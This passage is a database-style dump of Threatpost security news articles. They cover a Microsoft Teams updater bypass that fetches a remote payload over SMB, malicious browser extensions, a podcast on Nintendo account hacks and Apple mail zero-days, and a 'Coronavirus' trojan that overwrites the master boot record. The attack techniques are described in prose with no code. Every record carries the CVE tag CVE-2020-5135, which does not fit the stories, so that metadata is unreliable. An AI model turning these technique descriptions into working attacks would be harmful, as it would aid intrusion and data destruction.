an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-01T18:03:01", "type": "threatpost", "title": "Critical WordPress Plugin Bug Can Lock Admins Out of Websites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T18:03:01", "id": "THREATPOST:1973BA4B294E79D107940CF5DA67CB9A", "href": "https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:44", "description": "COVID-19 has [spurred the use of videoconferencing](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) for businesses worldwide \u2013 and this expanded threat surface has lured attackers like moths to a flame. Adding insult to injury, researchers have recently discovered a workaround for a previous patch issued for Microsoft Teams, that would allow a malicious actor to use the service\u2019s updater function to download any binary or malicious payload.\n\nEssentially, bad actors could hide in Microsoft Teams updater traffic, which has lately been voluminous.\n\n\u201cDue to the noisy nature of the [updater] traffic, there is a possibility that malicious traffic hiding there will evade the analyst\u2019s view or even be added to a list of allowed, and therefore unmonitored, list of applications,\u201d explained Reegun Jayapaul, researcher at Trustwave SpiderLabs, in [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/>) released on Wednesday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile Microsoft tried to cut off this vector as a conduit for remote code execution by restricting the ability to update Teams via a URL, it was not a complete fix, the researcher explained.\n\n\u201cThe updater allows local connections via a share or local folder for product updates,\u201d Jayapaul said. \u201cInitially, when I observed this finding, I figured it could still be used as a technique for lateral movement, however, I found the limitations added could be easily bypassed by pointing to an\u2026SMB share.\u201d\n\nServer Message Block (SMB) protocol is a network file sharing protocol. To exploit this, an attacker would need to drop a malicious file into an open shared folder \u2013 something that typically involves already having network access. However, to reduce this gating factor, an attacker can create a remote rather than local share.\n\n\u201cThis would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step,\u201d Jayapaul said.\n\nTrustwave has published a proof-of-concept attack that uses Microsoft Teams Updater to download a payload \u2013 using known, common software [called Samba](<https://threatpost.com/samba-update-patches-two-smb-related-mitm-bugs/128090/>) to carry out remote downloading.\n\nFirst, the researcher configured a Samba server for remote, public access. Then, a payload that supports the updater framework must be crafted and uploaded to a remote Samba server that has been authenticated from the Windows \u201cRun\u201d function.\n\n\u201cAfter a successful setup, I initiated the command execution, downloaded remote payload and executed directly from Microsoft Teams Updater, \u2018Update.exe,'\u201d the researcher explained.\n\n\u201cSince the installation is in the local user Appdata folder, no privileged access is needed,\u201d he added. \u201cAttackers can use this to masquerade the traffic (especially for lateral movement).\u201d\n\nMicrosoft won\u2019t be fixing the problem because \u201cwe determined that this behavior is considered to be by design as we cannot restrict SMB source for \u2013update because we have customers that apparently rely on this (e.g. folder redirection),\u201d the company told Trustwave.\n\nTo avoid or mitigate an attack, users can implement solutions that look for suspicious connections both inbound and outbound; and IT can install Microsoft Teams under the \u201cProgram Files\u201d folder, so an attacker cannot drop and execute the remote payload, according to the researcher. \u201cThis can be carried out by Group policy,\u201d Jayapaul said.\n\nCompanies can also disable any kind of update mechanisms and set a policy that updates should be pushed only by the IT team, he added.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-05T15:47:04", "type": "threatpost", "title": "Microsoft Teams Patch Bypass Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-05T15:47:04", "id": "THREATPOST:D819574E836325FD37CCA2E8B9E979A1", "href": "https://threatpost.com/microsoft-teams-patch-bypass-rce/158043/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:35", "description": "UPDATE\n\nBoth the Google Chrome and Mozilla Firefox teams are cracking down on web browser extensions that steal user data and execute remote code, among other bad actions.\n\nBrowser extensions are add-ons that users can install to enhance their web surfing experience \u2013 they offer the ability to do everything from setting a special search wallpaper to displaying continuous weather data to language translation. This group also includes things such as ad blockers and security scanning.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile extensions are useful, they can also introduce danger. In addition to [intentionally malicious](<https://threatpost.com/malicious-browser-add-guides-victims-phishing-sites-112912/77262/>) browser extensions that compromise users, legitimate offerings are also common targets for cybercriminals who [look to exploit vulnerabilities](<https://threatpost.com/cisco-webex-browser-bug/143285/>) in their code.\n\n## Google Bans Paid Extensions\n\nIn this case, Google said that after becoming aware of a widespread pattern of pernicious behavior on the part of a large number of Chrome extensions, it has disabled extensions that contain a monetary component \u2013 those that are paid for, offer in-browser transactions and those that offer subscription services. It\u2019s a temporary measure, according to the internet giant \u2013 but one that doesn\u2019t yet have a timeline for resolution.\n\n\u201cEarlier this month the Chrome Web Store team detected a significant increase in the number of fraudulent transactions involving paid Chrome extensions that aim to exploit users,\u201d it [said in a notice](<https://groups.google.com/a/chromium.org/forum/#!topic/chromium-extensions/EW0VuDjZSO4>), issued Friday. \u201cDue to the scale of this abuse, we have temporarily disabled publishing paid items. This is a temporary measure meant to stem this influx as we look for long-term solutions to address the broader pattern of abuse.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/27133106/google-paid-extensions.png>)\n\nClick to Enlarge: Top 5 Paid Chrome Extensions\n\nThe notice added, \u201cWe are working to resolve this as quickly as possible, but we do not have a resolution timeline at the moment. Apologies for the inconvenience.\u201d\n\nRejections will carry a \u201cSpam and Placement in the Store\u201d tag, the Google team told developers. Rejections can be appealed and will be reviewed, it noted.\n\nThe impact could be minimal. According to [data from Extension Monitor](<https://extensionmonitor.com/blog/breaking-down-the-chrome-web-store-part-1>) published mid-2019, there are about 188,000 extensions in the Chrome Web Store, out of which only about 9 percent (16,718) fall into the paid category. Paid add-ons also account for less than 2.6 percent of the more than 1 billion total extension installs logged in the research. The top five paid extensions make up about half (48.5 percent) of that number, with IE Tab dominating at 4.1 million installs (31.5 percent). About 35 percent of paid extensions (5,885) don\u2019t have any users at all.\n\n_**Updated 9:30 a.m. ET on Jan. 28: Threatpost has reached out to Google for clarification on whether existing paid extensions have been taken down, or if the policy applies only to updates and new submissions.**_\n\n## Mozilla Cleans House\n\nMozilla meanwhile has taken a more case-by-case tack, disabling 197 Firefox add-ons in total for a range of improper activity, as first [reported by ZDnet](<https://www.zdnet.com/article/mozilla-has-banned-nearly-200-malicious-firefox-add-ons-over-the-last-two-weeks/>). This includes remote code-execution and harvesting user data. The add-ons have not only been removed from the official Mozilla Add-on (AMO) portal, but have been disabled in the browsers of existing installs.\n\nThe disabled apps include a whopping 129 extensions from 2Ring, which offers extensions and add-ons that provide business-to-business functionality for unified communications and contact centers. It\u2019s a Cisco Preferred Partner, and it [says on its website](<https://www.2ring.com/products/>) that it has \u201ca roadmap aligned with Cisco\u2019s collaboration portfolio and with solutions that their system engineers can deploy repeatedly and support with ease.\u201d\n\nThreatpost reached out to 2Ring for comment. Meanwhile, \u201cI\u2019ve reviewed the add-ons and confirmed they are executing remote code,\u201d according to the bug tracker on the issue.\n\nThat\u2019s not to say the extensions were intentionally malicious. Mozilla\u2019s policy is that extensions that dynamically fetch code from elsewhere, legitimate or otherwise, are in violation of its [content security policy](<https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_Security_Policy>).\n\nThe blocked extensions uncovered by ZDnet also include [six add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1609718>) deemed to be executing remote code, which were developed by Tamo Junto Caixa. [Tamo Junto](<https://aliancaempreendedora.org.br/tamojunto/faq/>) is a banking entity that offers Brazilian microentrepreneurs online courses, video classes, articles and management tools.\n\nOther browser extensions, like Rolimons Plus (an extension linked to the Roblox online multiplayer video game), [was blocked](<https://bugzilla.mozilla.org/show_bug.cgi?id=1608432>) for \u201ccollecting ancillary user data against our policies,\u201d while others (unnamed in the bug ticket) [were banned](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610462>) for \u201cshowing malicious behavior on third-party websites.\u201d Still others, including [three unnamed add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610456>), were determined to be \u201cfake premium products.\u201d\n\nAs with Google Chrome, Mozilla developers are able to appeal the bans.\n\nAt least one researcher said that the actions are likely the fruit of heightened concerns and regulations around privacy, including the California Consumer Privacy Act (CCPA).\n\n\u201cIn the [post-CCPA/GDPR world](<https://threatpost.com/californias-tough-new-privacy-law-and-its-biggest-challenges/151682/>), tech companies are paying greater attention to the risks that software poses to users,\u201d said Mike Bittner, associate director of Digital Security and Operations for The Media Trust, via email. \u201cMuch of the risks stem from having no control over what impact code will have on the security and privacy of user personal data. Until tech companies know who\u2019s running what code in the various components that make up extensions and other forms of software, the risk of fraud and theft will remain high, as will the risk of running afoul of these new privacy laws.\u201d\n", "cvss3": {}, "published": "2020-01-27T21:26:55", "type": "threatpost", "title": "Google, Mozilla Ban Hundreds of Browser Extensions in Chrome, Firefox", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-01-27T21:26:55", "id": "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C", "href": "https://threatpost.com/google-mozilla-ban-browser-extensions-chrome-firefox/152257/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:07", "description": "For the week ended April 24, Threatpost editors discuss the hottest cybersecurity news stories, including:\n\n * Apple [zero days disclosed](<https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/>) in the iPhone iOS that researchers say have been exploited for years. Meanwhile, [Apple has pushed back](<https://threatpost.com/apple-pushes-back-against-zero-day-exploit-claims/155108/>) and said there\u2019s no evidence to support such activity.\n * Nintendo [confirming that](<https://threatpost.com/nintendo-confirms-breach-of-160000-accounts/155110/>) over 160,000 accounts have been hacked, due to attackers abusing a legacy login system (NNID).\n * With the [NFL\u2019s virtual draft](<https://threatpost.com/nfl-tackles-cybersecurity-2020-draft-day/155004/>) kicking off this week, security researchers and teams have been sounding off on security issues leading to data theft or denial of service attacks.\n\n[Download direct here](<http://traffic.libsyn.com/digitalunderground/news_wrap_apr_24_3.mp3>), or listen to the podcast below.\n\n[\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/14130716/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below find a lightly edited transcript of the Threatpost news wrap._\n\n**Lindsey O\u2019Donnell-Welch**: Hello everyone, welcome back to the [Threatpost news wrap](<https://threatpost.com/category/podcasts/>). You\u2019ve got the Threatpost team here today to discuss this week\u2019s top cyber security news, including myself, Lindsey O\u2019Donnell-Welch and Threatpost editors Tom Spring and Tara Seals. Tom and Tara, happy Friday.\n\n**Tom Spring**: Hey!\n\n**Tara Seals: **Hey, Lindsey. How are you?\n\n**Lindsey: **Good. There\u2019s been a lot of news from this week that we need to unpack. We\u2019ve had leaked source code, Apple zero days, security issues around the NFL draft. So, Tom, I mean, starting with the Apple zero days, that was kind of a huge news item of the week, and there was some back and forth, and I think the most recent thing, was Apple having a statement come out today about the zero days. Can you kind of give us a sense of what that was all about?\n\n**Tom:** Well, sure, sure. It\u2019s an evolving story. And it started a couple days ago when a number of researchers and I\u2019m probably gonna mispronounce the name of the security firm, ZecOps or something along those lines -I can never pronounce these names \u2013 But anyways, they found two zero days, or what they claimed are two zero days that are very, very troubling when described. An attacker can send an email to an iOS device. And if Apple\u2019s default mail program receives that message, there are two vulnerabilities \u2013 an out of bounds write vulnerability and a heap overflow bug \u2013 that kick in when this specially crafted message arrives. In very simple terms, the bugs impact the way that the mail program processes memory. And I won\u2019t get into the technical aspects of it, we\u2019ve written about it, it\u2019s on Threatpost. But essentially, the hackers can use this to either extract data from the mailbox itself, and or combine the flaw to actually take over the device or take control of the device. This was something that was very shocking considering that any modern patched version of the iOS was vulnerable to this attack. The researchers said that this is an attack that\u2019s been used in the wild in a number of targeted attacks by some APTs. And so that story goes. Apple did release a beta update to iOS. And it was reported a couple days ago. And it seemed to suggest Apple was kind of quiet at the time. But given that Apple had released a beta version of its iOS, it seemed that Apple was was not explicitly stating that there was a problem, but suggested it by sending out a patch. Now today, Apple is downplaying the impact of the bug and saying that it has found no evidence that that the bug, number one, has been used in the wild. And just to briefly, quote, Apple\u2019s statement released I believe was yesterday: \u201cWe have concluded these issues do not pose an immediate risk to our users. The researchers identified three issues in mail, but alone, they are insufficient to bypass iPhone or iPad protections. And we have found no evidence they were used against customers.\u201d So we have the classic he said, she said, and we\u2019ll see how this plays out. But it\u2019s high drama, once again with zero days, zero day claims and zero day denials.\n\n**Lindsey:** Yeah, it definitely seems like it is turning into kind of a he said-she said type of report. And it\u2019s interesting too, you know, just looking at ZecOp\u2019s report, they did kind of go into deep detail about the flaws being exploited in the wild. And I think they had mentioned that there were a number of different targets, including individuals from a Fortune 500 org in North America, and executives from a Japanese based carrier. So it is just kind of interesting that Apple is pushing about back against those specific claims that the bugs have been exploited for years. And I\u2019m curious to see kind of where this goes and whether the researchers respond back to Apple at all, and, you know, further kind of corroborate what they had written in the report.\n\n**Tom:** Yeah, well, you know, Apple has gotten some support from the research community. I believe that Google\u2019s Project Zero researchers have chimed in expressing some doubt on the ZecOps research. Meanwhile if anybody\u2019s worried there is the beta version of the iOS that you can download right now and I\u2019m sure we\u2019re going to be hearing more from Apple about them pushing out an update, a final update, for the iOS as well. But you know, I mean, I mean here again, you have Apple which is tight lipped won\u2019t comment and I mean, they have to put out a statement days after the the researchers come out with their their findings. From a reporter standpoint, it would be so nice [if Apple would open up a bigger dialogue](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>), not only with journalists, but especially with researchers in terms of maybe helping them better understand what they found, the original research really, casted no doubt on their own research. I mean, why would they, but at least, you know, they could have tempered some of their research with some feedback from Apple. I\u2019m not too sure if they purposely left it out. But you know, historically speaking, it\u2019s tough for researchers to get to vendors to give a [full throated response to their research](<https://threatpost.com/google-bug-hunter-urges-apple-to-change-its-ios-security-culture/134842/>), but we shall be following this story. I\u2019m sure we might even see some interesting things happen over the weekend and Monday morning. We\u2019ll be watching carefully.\n\n**Tara**: I have a question Tom. Have there been any third party researchers that have taken a look at this and weighed in at all with an opinion?\n\n**Tom:** Well, Google Project Zero did. And they cast some doubt on the research itself. I\u2019m not aware of anybody else, I\u2019ve heard a lot of researchers comment on the zero days, but they were commenting in reaction to the actual research being released, they weren\u2019t commenting on, their own reverse engineering, the proof of concepts and dissecting the research itself. So, you know, there could be a lot more noise going out there. And again, this is a fast moving story, and it\u2019s evolving quickly. And we will be keeping a close eye on the Twittersphere of reliable researchers and reaching out to a lot of people on the phone and hopefully, we\u2019ll have a good solid update either over the weekend or ASAP to better assess the real threat here with these \u201czero days.\u201d\n\n**Lindsey: **Right. Well, that was definitely one of the bigger stories of this week. And actually another big story, I guess two similar stories kind of revolved around the gaming community. And one of those stories was Nintendo today, coming out and confirming that 160,000 accounts have been hacked.\n\n**Tom:** Yeah Lindsey, which Nintendo\u2019s accounts? Do we know? I mean, I\u2019m just thinking about my my son\u2019s different accounts with Nintendo. Do we know what platform or services may have been impacted?\n\n**Lindsey:** Yeah, so, basically over the past few weeks, gamers who are using the Nintendo Switch were reporting suspicious activities on their accounts. And they were basically going on Twitter and there were different posts on Reddit saying that unauthorized actors had been logging into their accounts using their PayPal or their payment card methods that were connected to the accounts and buying digital currency for like, online in-game systems. So like [Fortnite V-Bucks](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>), etc, etc. This was reported over the past few weeks by various outlets, but Nintendo had stayed kind of silent about whether this was actually happening or what was behind this. And finally, in a statement today, it said that it first of all confirmed the attacks, it said that specifically 160,000 accounts were hacked, and it said the reason that this hack was occurring was because attackers were abusing the Nintendo Network ID legacy login system, which I don\u2019t know if you guys remember but that was from the Nintendo 3DS and Wii U console. That was what was primarily used to login and to buy digital currency for those accounts. So anyways, Nintendo was saying that this login ID was being linked to various Nintendo accounts for the switch. And somehow attackers were able to access the accounts tied to this legacy login system and were then able to access the linked Nintendo accounts for the Switch. And from there, they\u2019d have access to the different payment methods, and were able to make the in-game purchases. So Nintendo didn\u2019t provide any further details about how these accounts were specifically being accessed. But they did say that they were being obtained by some means other than their own service. So I know there had been theories about like credential stuffing or otherwise but that doesn\u2019t seem like it was the case here. So it\u2019s now disabled the NNID login service so that you can\u2019t use that anymore.\n\n**Tom:** Well, I\u2019ll hear from my son with if he\u2019s had trouble connecting, and I\u2019ll know what\u2019s going on.\n\n**Lindsey:** Yeah, yeah, I would check in and make sure.\n\n**Tom:** I wrote a [story about at Linksys, they had to reset their passwords](<https://threatpost.com/attacks-on-linksys-routers-trigger-mass-password-reset/154914/>). And I\u2019m a Linksys customer. And they assured me that every single Linksys customer had been notified. And then I was like, \u201cWell, hold on a minute. I\u2019m a Linksys customer, I haven\u2019t been notified.\u201d And they backtracked and said, \u201cwell, we\u2019re doing it in waves.\u201d So I take it with a grain of salt, when a lot of these companies say they\u2019ve implemented a fix \u2013 whether or not that fix is immediate or whether phases in over time. So I\u2019ll be interested to hear whether my son\u2019s actually having issues or not, or whether they\u2019ve reset passwords or whatnot.\n\n**Lindsey:** Yeah, well, it seems like a lot of companies can post the statement onto their Twitter accounts or on their website and think that\u2019s enough. But you\u2019d be surprised that the number of people who actually need the email notification to be notified of these hacks. So, but it did advise players to set up two factor authentication, of course, to add that extra layer of security to accounts. And it is also resetting the passwords for affected accounts. So hopefully, this problem will go away. I know it had been a widespread kind of issue for people who had been reporting about it online. So we\u2019ll see.\n\nThat was one of the news related to kind of gaming. The other one was the [discovery of leaked source code this week](<https://threatpost.com/valve-confirms-csgo-team-fortress-2-source-code-leak/155092/>) for two popular games that were published by Valve. Those were Counter Strike: Global Offensive and Team Fortress 2. And basically, that was a whole issue because the source code, if accessed, could lead to security issues or cheating, which probably isn\u2019t as serious, but you know, it\u2019s still a problem. And Valve, the developer and publisher of the two games, came out and basically said that the source code in question dates back to 2017, and was already part of an existing leak from 2018. But anyways, I think that goes to show that these security issues do continue to pop up in the gaming space. And there\u2019s such like a massive install base for gamers that this is just a [really lucrative area for cybercriminals](<https://threatpost.com/researcher-discloses-second-steam-zero-day-after-valve-bug-bounty-ban/147593/>) to be looking at.\n\n**Tara:** Yeah, I definitely think that\u2019s the point I was going to make is that, I think, Nintendo has 20 million active users or something like that. And these massive multiplayer games have millions of users to in some cases, and so, you know, I\u2019m surprised we don\u2019t care more about gamer hacking stuff to be honest.\n\n**Lindsey:** Yeah, definitely. I definitely agree, Tara. And so, and then Tara, you also had a very timely news story about the NFL Draft, which is virtual this year and kind of the security concerns that researchers and also teams were having with the event as it starts this week. What was kind of the top concerns there?\n\n**Tara: **Yeah, so the NFL Draft, obviously is a massive, massive event for the league every single year. This is for the sliver of the population that doesn\u2019t know about it, it\u2019s basically where you have pro teams that are looking at the people that are coming out of college and, you know, the Canadian league and some other places that you know, have not been signed to the pros yet, and they evaluate their stats and everything and then this is their opportunity to find new people to the roster. And so in the past this has been done in sort of public space and everybody kind of gets together and teams will congregate at their stadiums and war rooms and things like that. That\u2019s not possible. And so everybody is basically trying to do this with one to one links, you know, from their houses. So you have a head coach in his house or her house, and then you have, you know, the GM in their house and then obviously, all the players trying to tune in, the prospective players that is and so if you look at it, the communications footprint here, the distributed communications footprint is pretty massive. And so in order to bring everybody together to make this happen, there\u2019s a couple of different platforms to do that, one was Microsoft Teams, and then there\u2019s Zoom, you know, infamous Zoom, which clubs are using to communicate amongst themselves.\n\n**Lindsey:** The security issues here are really something that\u2019s good to be looking at right now, with something as big as this, and it\u2019s something that we\u2019ll also have to probably continue looking at for for the foreseeable future. But I also think kind of the technical logistics in the background are important too. And I saw on Twitter yesterday, there was like this [picture of Belichick looking at the draft from his house](<https://twitter.com/jeffphowe/status/1253504449244512257?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1253504449244512257&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost.php%3Fpost%3D155122%26action%3Dedit>) in Nantucket and a bunch of people were, laughing about the fact that, questioning how he was able to get Wi-Fi on on Nantucket, and whether it was able to hold up and all these things. So I think, it\u2019s just so new that there\u2019s a lot of like questions and technical concerns there too.\n\n**Tara:** Yeah, it\u2019s kind of interesting because there are 100+ video feeds when you take into account you know, all the general managers, all the prospects which there are 58 different prospects and the coaches themselves and then plus that\u2019s not even including, you know, the individual underlings that are involved in the process. But yeah, the Belichick thing was really funny. And then also the [head coach of the Arizona Cardinals was all over Twitter](<https://twitter.com/nfldraftscout/status/1253478908487503873?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1253478908487503873&ref_url=https%3A%2F%2Fnesn.com%2F2020%2F04%2Fnfl-twitter-went-bananas-after-seeing-cardinals-kliff-kingburys-pad%2F>), it went totally viral yesterday, he has this sort of Bond villain layer in the Phoenix mountains vibe. It was all like gleaming white and like he\u2019s wearing, you know, Italian loafers. And he just looks at like an Armani ad or something. I mean, there\u2019s a lot of cultural fun stuff that goes along with this. But there\u2019s also a lot of, you know, legitimate cyber security concerns. And so, with the draft picks, you know, you wouldn\u2019t think of that as being sort of critical information, but it really is. And you consider that if a team\u2019s job strategy is leaked to another team, then that\u2019s obviously competitive and that can destroy a team season in theory. You also have, if these things are able to be intercepted, then it can be very useful for people in the online gambling world, for example, there\u2019s a lot of fraud that can be carried out with that. And so there are a few different things that can be done if job information falls into the wrong hands. And so that\u2019s really what they were concerned about. I did reach out to the NFL to find out what their take was on cyber security, and they wouldn\u2019t reveal what exactly they\u2019ve done. But they did say that they they are aware of the potential dangers, and I mean, the draft is going to continue through tomorrow. So, you know, remains to be seen if they successfully warded off any attacks or not.\n\n**Lindsey:** Right, I was about to ask if there have been any incidents so far, but I\u2019m sure that remains to be seen at this point. But yeah, I think that you know, obviously the the data itself in terms of team strategy and personnel plans is a big issue. And also I feel like denial of service could be an issue here too. And you know, launching a denial of service attack or even kicking people off.\n\n**Tara:** Yeah, I\u2019m so glad that you said that actually. Because that is that is one thing that one of the security researchers that I talked to had mentioned was that the denial of service aspect of this, obviously. So anybody who plays Fantasy Football is familiar with this, but you get a very short window of time to make your job spec and it\u2019s kind of a snooze, you lose if you don\u2019t do it in that time period, then you get passed over and you don\u2019t get to go back and redo it. So, you know, conceivably, an attacker could DDoS someone you know, a club and prevent them from making their draft pick and there would be no way for them to go back and remediate that really. So again, these are things that can make a pretty radical difference when it comes to the team\u2019s future. And of course, this is assuming that we\u2019re going to have an NFL season this year.\n\n**Lindsey:** We\u2019ll see. Fingers crossed. I really like that story. It\u2019s a fun and applicable story. And you know, I put it on Facebook and someone posted, \u201cyou know [the NFL has] been hacked when the first person picked is Terry Bradshaw.\u201d All right. Well, on that note, it\u2019s been a very busy week in the infosec world, and there\u2019s much more that needs to be covered. So let\u2019s wrap up the podcast here, Tom and Tara, thanks for coming on today.\n\n**Tom:** Yeah, thank you.\n\n**Tara:** Thanks, Lindsey. You guys have a good weekend.\n\n**Lindsey:** You too. And to all our listeners. Thank you for joining us today. If you like what you\u2019ve heard here, be sure to share this episode on social media. And if you have any comments or thoughts regarding Apple zero days, or any of the new stories that we\u2019ve talked about today, please [reach out to us on Twitter at @Threatpost](<https://twitter.com/threatpost>) and let\u2019s keep the conversation going. If not catch us next week on the Threatpost podcast.\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-04-24T17:11:16", "type": "threatpost", "title": "News Wrap: Nintendo Account Hacks, Apple Zero Days, NFL Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-24T17:11:16", "id": "THREATPOST:CAAA6F4ECA9D8F91250F10C27A869E23", "href": "https://threatpost.com/news-wrap-nintendo-account-hacks-apple-zero-days-nfl-security/155122/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:51", "description": "A new Windows malware has emerged that makes disks unusable by overwriting the master boot record (MBR). It takes its cue from the COVID-19 pandemic, calling itself simply \u201cCoronavirus.\u201d\n\nOverwriting the MBR is the same trick that the infamous NotPetya wiper malware used in 2017 in a campaign that caused widespread, [global financial damage](<https://threatpost.com/pharmaceutical-giant-still-feeling-notpetyas-sting/127130/>).\n\nWorryingly, according to the SonicWall Capture Labs Threat Research team, the fresh malware strain is also a destructive trojan \u2014 though not as destructive as other wipers. And like its namesake, there\u2019s no obvious cure. In [a posting on Tuesday](<https://securitynews.sonicwall.com/xmlpost/coronavirus-trojan-overwriting-the-mbr/>), researchers explained that victims of the Coronavirus trojan find themselves with a gray screen and a blinking cursor with a simple message, \u201cYour computer has been trashed.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe novel coronavirus, and the disease it causes, COVID-19, has provided a depth of fodder for cybercriminals looking to capitalize on the global concern around the pandemic. For instance, a recent spate of phishing attacks has used [the promise of financial relief](<https://threatpost.com/coronavirus-financial-relief-phishing-spike/154358/>) due to the disease as a lure. However, the operator behind this malware takes it one step further, going so far as to take the coronavirus as its name and infection theme.\n\nAs far as that infection routine, the malware can be delivered in any of the usual ways \u2013 as a malicious email attachment, file download, fake application and so on.\n\nUpon execution, the malware starts its process by installing a number of helper files, which are placed in a temporary folder. The malware cleaves tight to its pandemic theme: An installer (a helper file named \u201ccoronavirus.bat\u201d) sets up the attack by creating a hidden folder named \u201cCOVID-19\u201d on the victim machine. The previously dropped helper files are then moved there, in an effort to go unnoticed until its goal is achieved.\n\nAfter that, the installer disables Windows Task Manager and User Access Control (UAC) in a further stab at obfuscation, according to the analysis. It also changes the victim\u2019s wallpaper, and disables options to add or modify that wallpaper after the change is made. It also adds entries in registry for persistence, and then sets about rebooting to finish the installation.\n\nThe process run.exe creates a batch file named run.bat to ensure the registry modifications done by \u201ccoronavirus.bat\u201d are kept intact during the reboot process, according to SonicWall.\n\nAfter reboot, the infection executes two binaries. One, \u201cmainWindow.exe,\u201d displays a window with a picture of the coronavirus itself, with two buttons. At the top of the window, the victim is notified that \u201ccoronavirus has infected your PC!\u201d\n\nThe two buttons read \u201cRemove virus\u201d and \u201cHelp.\u201d The former does nothing when clicked; the latter brings up a pop-up that tells victims to \u201cnot wast [sic] your time\u201d because \u201cyou can\u2019t terminate this process!\u201d\n\nThe other binary carries out the meat of the attack: It\u2019s responsible for overwriting the MBR.\n\n\u201cThe original MBR is first backed up in the first sector before it is overwritten with new one, [and the] MBR is overwritten with the new code,\u201d according to the researchers.\n\nOnce the overwrite is complete, the victim\u2019s display is changed to a simple grey screen delivering the bad news:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/01164031/corona-trojan-grey-screen.png>)\n\nSonicWall told Threatpost in an email interview that it was able to analyze the sample after it was uploaded to VirusTotal. Thus, so far, there haven\u2019t been many instances of \u201cCoronavirus\u201d observed in the wild, and little in known in terms of targeting or what the spreading mechanisms are for the mysterious new malware.\n\nThe team also told Threatpost that the good news is that this is not as dangerous as other wiper strains.\n\n\u201cEven if the MBR is not restored\u2026data can still be accessed/recovered by mounting the drive,\u201d the firm noted. \u201cThe MBR [also] can be potentially restored, but it is not easy and [requires deep technical knowledge](<https://neosmart.net/wiki/fix-mbr/>).\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with 